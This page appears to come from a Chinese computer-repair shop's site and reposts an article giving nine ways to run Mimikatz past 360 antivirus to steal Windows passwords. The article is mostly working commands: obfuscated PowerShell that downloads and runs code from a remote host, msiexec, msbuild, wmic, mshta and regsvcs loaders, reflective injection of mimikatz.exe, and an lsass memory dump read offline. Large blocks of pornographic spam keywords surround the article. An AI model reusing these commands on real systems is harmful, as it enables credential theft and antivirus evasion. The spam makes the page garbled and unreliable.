国产精品久av福利在线观看_亚洲一区国产精品_亚洲黄色一区二区三区_欧美成人xxxx_国产精品www_xxxxx欧美_国产精品久久婷婷六月丁香_国产特级毛片

錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
九種姿勢運行Mimikatz
作者: 佚名  日期:2018-07-14 13:03:46   來源: 本站整理

 前言
平時收集的一些姿勢,用戶繞過殺軟執行mimikatz,這里以360為例進行bypass 測試。
下載最新版360:

未經處理的mimikatz直接就被殺了

下面開始進行繞過360抓密碼
姿勢一-powershell
https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1
cmd下執行
C:\Users\test\Desktop>powershell -exec bypass "import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz"
也可以遠程加載
powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.101/Invoke-Mimikatz.ps1');Invoke-Mimikatz
但是powershell被360攔截

簡單混淆就bypass了
powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.0'+'.101/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"
動圖:/article/UploadPic/2018-7/201871316575152.gif
姿勢二-用.net2.0加載mimikatz
作者Casey Smith, Twitter: @subTee
下載
https://gist.githubusercontent.com/nicholasmckinney/896b508b6cf1e8c3e567ccab29c8d3ec/raw/afa7219adbfcdfc160c163273ef8ec61ff0658b4/katz.cs
將katz.cs放置C:\Windows\Microsoft.NET\Framework\v2.0.50727
先powoershell執行
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Contentkey.snk -Value $Content -EncodingByte
再cmd執行
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs
C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe katz.exe
動圖:/article/UploadPic/2018-7/201871316579593.gif
姿勢三-JS加載mimikatz
用DotNetToJScript實現
https://github.com/tyranid/DotNetToJScript
mimikatz
https://gist.github.com/500646/14051b27b45dce37818aca915e93062f/raw/2adcc9d2570b4367c6cc405e5a5969863d04fc9b/katz.js
執行cscript mimikatz.js 

但是這個方法已經會被一些殺軟標記成惡意軟件,繞過方法參考
https://evi1cg.me/archives/AMSI_bypass.html
姿勢四-msiexec加載mimikatz
作者 homjxi0e
下載
https://github.com/homjxi0e/PowerScript/blob/master/Mimikatz.2.1.1/X64/Mimikatz%20x64.msi
遠程執行
PS:> msiexec.exe /passive /i https://github.com/homjxi0e/PowerScript/raw/master/Mimikatz.2.1.1/X64/Mimikatz%20x64.msi /norestartcmd:> msiexec.exe /passive /i https://github.com/homjxi0e/PowerScript/raw/master/Mimikatz.2.1.1/X64/Mimikatz%20x64.msi /norestart
本地執行
msiexec /passive /i C:\Users\Administrator\Downloads\Mimikatz.msi
姿勢五-.net4.0加載mimikatz
作者 subTee
下載mimikatz.xml
https://raw.githubusercontent.com/3gstudent/msbuild-inline-task/master/executes%20mimikatz.xml
執行
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exemimikatz.xml

姿勢六-JScript的xsl版
作者 subTee
下載
https:/gist.github.com/manasmbellani/7f3e39170f5bc8e3a493c62b80e69427/raw/87550d0fc03023bab99ad83ced657b9ef272a3b2/mimikatz.xsl
本地加載
wmic os get /format:"mimikatz.xsl"
遠程加載
wmic os get /format:"http://127.0.0.1/mimikatz.xsl"
姿勢七-jscript的sct版
作者 subTee
下載
https:/gist.github.com/caseysmithrc/3fe7a8330a74b303562eb494d47e79c5/raw/9336891fc81ac71bfff3c8fd4a8816dead30964e/mimikatz.sct
執行
mshta.exe javascript:a=GetObject("script:https://gist.github.com/caseysmithrc/3fe7a8330a74b303562eb494d47e79c5/raw/9336891fc81ac71bfff3c8fd4a8816dead30964e/mimikatz.sct").Exec(); log coffee exit

姿勢八-內存中加載mimikatz
下載
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1
執行
powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.101/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://192.168.0.101/mimikatz.exe -ExeArgs "sekurlsa::logonpasswords" -ForceASLR
動圖:/article/UploadPic/2018-7/2018713165715106.gif
姿勢九-導出lsass進程離線讀密碼
下載procdump64.exe
執行
procdump64.exe-accepteula-malsass.exe 1.dmp
也可以在任務管理器中操作

然后將1.dmp下載到本地
mimikatz_2.1_64.exe "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit

總結
1.對比這幾種方式個人還是喜歡導出lsass進程內存方式來讀取密碼。
2.也可以用powershell遠程加載mimikatz腳本讀密碼,簡單方便。
 
熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
    • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    97涩在线观看视频| 日韩精品手机在线观看| 五月婷婷欧美视频| 99视频这里有精品| 翔田千里一区二在线观看| 午夜老司机精品| 亚洲成人免费av| 国产欧美日韩影院| 淫行教师动漫| av无码精品一区二区三区| 91福利资源站| av电影在线观看一区| 999久久久国产精品| 另类图片亚洲色图| 黄色一级视频免费看| 亚洲欧美日韩另类精品一区二区三区| 成人av在线网站| 色吊丝在线永久观看最新版本| 精品人妻一区二区三区换脸明星 | 免费观看h片| 人妻内射一区二区在线视频| 久久嫩草精品久久久精品一| 九九热播视频在线精品6| 韩国av永久免费| 欧美国产二区| 欧美男人的天堂一二区| 久久99久久99精品免视看婷婷| 亚洲黄页网站| 97在线观看播放| 国产精品视频久久久久久| 日本成人中文字幕在线| 国产成人黄色av| 久久精品国产亚洲a| 成人直播大秀| 黄色影院在线播放| 免费黄色av电影| 猫咪av永久| 黄色av免费网站| v888av成人| 91福利免费在线| 免费h片在线| 99久久精品日本一区二区免费| 色综合av综合无码综合网站| 欧美一区二区三区精品电影| 日韩女优毛片在线| 成人免费视频视频| 天堂精品中文字幕在线| 欧美成人午夜77777| 人xxxx性xxxxx欧美| 国内自拍视频网| 欧美精品免费播放| 91麻豆国产福利在线观看| 国产精品99久久久久久董美香| 在线伊人电影| 免费观看日批视频| 免费网站在线高清观看| 国产精品免费区二区三区观看| 91在线看国产| 在线看片一区| 91成人短视频在线观看| 日韩黄色影院| 色视频在线观看在线播放| 日韩成人短视频| 久章草在线视频| 国产欧美在线播放| 97婷婷涩涩精品一区| 美女av一区二区| 久久久亚洲精品视频| 国产91av在线| 亚洲国产精品高清久久久| 亚洲人成7777| 成人禁用看黄a在线| 午夜国产一区| 一二三区在线视频| 手机看片一区二区| 艳妇乳肉豪妇荡乳xxx| 99在线视频播放| 亚洲性生活视频| 亚洲高清免费观看高清完整版在线观看| 处破女av一区二区| 日韩高清在线观看一区二区| 欧美午夜大胆人体| av官网在线播放| 欧美a在线看| 日韩美女一级视频| 在线观看色视频| 国产污视频网站| 妺妺窝人体色www聚色窝仙踪 | 欧美成人片在线| 男人天堂2020| 国产三级视频在线| 传媒在线观看| 国产高清自拍视频在线观看| h视频在线观看免费完整版| 欧美久草视频| 国产欧美日韩精品综合| 九九久久精品这里久久网| 青青在线观看视频中文字| 国产精品500部| 色哟哟网站在线观看| 久久伊人一区| 日韩av综合网| 午夜一区二区三区视频| 国产精品综合二区| 全部av―极品视觉盛宴亚洲| 欧美三级免费| 综合伊思人在钱三区| 韩日精品一区| 精品国产一区二区三区成人影院| 精品按摩偷拍| 亚洲一区观看| 亚洲福利一二三区| 国产一区二区三区网站| 97视频在线观看播放| 69精品小视频| 久久男人资源视频| 国产亚洲欧美一区二区三区| 日韩欧美视频网站| 亚洲av无码久久精品色欲| 久久亚洲AV无码专区成人国产| 69视频在线观看免费| 亚洲av无码不卡| 无码视频在线观看| 国产人妻精品一区二区三区| 一级黄色片网站| 丁香花免费高清完整在线播放| 亚洲精品自产拍在线观看app| 韩国三级电影在线观看婷婷| 亚洲天堂777| 中文字幕av在线免费观看| 四虎精品永久在线| 免费在线观看黄网站| 日韩精品在线不卡| 看片网址国产福利av中文字幕| 性网爆门事件集合av| 免费观看又色又爽又黄的网站| 成人频在线观看| 成年人视频在线看| 电影一区二区| 精品国产亚洲一区二区在线观看 | 国产高清一区二区三区四区| 天天干天天做天天操| 99在线播放| 色呦哟—国产精品| 亚洲福利视频导航| 亚洲人成电影在线播放| 久久精品中文字幕免费mv| 91精品视频一区| 国产一区二区三区奇米久涩| 国产中文字幕二区| 亚洲成人福利在线| 免费一级做a爰片久久毛片潮| www.色亚洲| 影音先锋男人资源站| 青青草免费在线观看| а√最新版在线天堂| 日韩偷拍自拍| hd国产人妖ts另类视频| 超薄肉色丝袜脚交一区二区| 婷婷五月色综合香五月| 亚洲午夜av| 中文字幕一区日韩精品欧美| 亚洲精品美女久久久久| 欧美国产日韩一区二区三区| 国产精品一二区| 熟女人妇 成熟妇女系列视频| 国产这里有精品| 岛国影视在线观看| 一二区成人影院电影网| 日韩二区在线观看| 亚洲电影一区二区| 国产一区二区三区18| 成人精品网站在线观看| 国产一区二区视频免费在线观看| 亚洲欧美小视频| 二区三区偷拍浴室洗澡视频| 日本不卡1区2区3区| 日韩久久一区| 久久综合电影| 精品一区二区三区在线观看国产 | 亚洲黄色在线观看视频| 麻豆av在线| 欧洲午夜精品| 国产一区二区三区综合| 欧美日韩免费在线观看| 美女av一区二区| 黑森林福利视频导航| 国产在线观看黄色| 免费成人看片| 激情小说亚洲图片| 久久精品在线观看| 精品国产人成亚洲区| 国产精品电影一区| 成人小视频在线观看免费| 亚洲熟女乱色一区二区三区久久久 | 欧美激情aⅴ一区二区三区| 久久亚洲二区三区| 91精品国产综合久久久久| 国产精品青草久久久久福利99| aa在线免费观看|